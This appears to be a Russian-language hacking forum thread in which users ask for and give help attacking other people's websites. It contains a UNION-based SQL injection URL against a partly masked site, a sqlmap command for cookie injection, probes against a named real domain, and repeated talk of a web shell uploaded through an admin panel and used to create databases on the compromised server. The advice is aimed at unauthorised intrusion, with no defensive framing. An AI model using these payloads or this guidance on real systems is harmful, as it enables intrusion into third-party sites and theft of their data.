Code: http://www..**********/pixsell/imageview.php?id=392751 union/*!select*/ (1),(2),(user()),(4),(5),(6),(7),(8),(9),(10),(11),(12)
во вкладке [SQL] вводишь данные для подключения к БД, там появляется консоль, в ней уже вводишь команды для создание БД, почитай справочник _ttp://www.mysql.ru/docs/man/Database_use.html полезно будет!
Есть участок кода на чужом сайте: Code: <?php $data=file_get_contents("http://site.ru"); echo $data; ?> Содержимое http://site.ru я могу редактировать, то есть в переменной $data подконтрольный текст и он выводится на стороннем сайте. Какая тут уязвимость, возможно ли выполнение произвольного кода или создание php файла на сервере или тут только XSS? .
Можешь попробовать заюзать как локальную читалку! eval реализовать не получится, так как вывод через echo $data; Ищи конфиги БД и пробуй подключиться!
Сайт без БД, то есть код выполнить никак нельзя? Если говорить точнее то вывод идет через: Code: $GLOBALS['_RESULT']=array( "otvet" => "тут строка моя" ); exit; Вывод подхватывается JS и выводится на сайте.
тогда ищи уязвимости в функциях и пробуй их реализовать, можно еще попробовать сайты соседей посмотреть...
Помогите составить запрос в sqlmap на sql inj cookie sqlmap.py -u "http://site:.com/index.php" --cookie="cacheSession=*" --random-agent --level=2 --risk=1 верно? Он то показывает блинд , то нет
допустим через админку я залил шелл, ввел данные для подключения к БД данного сайта, зашел, появилась консоль в ней я могу создать новую базу данных(чистую) не затрагивая уже существующую и создать на серваке еще один сайт?
Помогите раскрутить HTML: http://www.svetodom.ru/brand/jhkhjkhjk http://www.svetodom.ru/brand/jhkhjkhjk+AND
Br@!ns, еще добавлю, что нынче модно использовать короткие запросы. Вот еще для изучения пару векторов с выводом через error-based (VolgaCTF::MySQL Game):
Подскажите плиз залил шелл, ввел данные для подключения к БД данного сайта, зашел, появилась консоль в ней я могу создать новую базу данных(чистую) не затрагивая уже существующую и создать на серваке еще один сайт?
Инъекция в INSERT. Вывод ошибок есть. Пытаюсь использовать error based вектор, но таблицы в которую происходит INSERT на сервере нету. Можно ли такое раскрутить?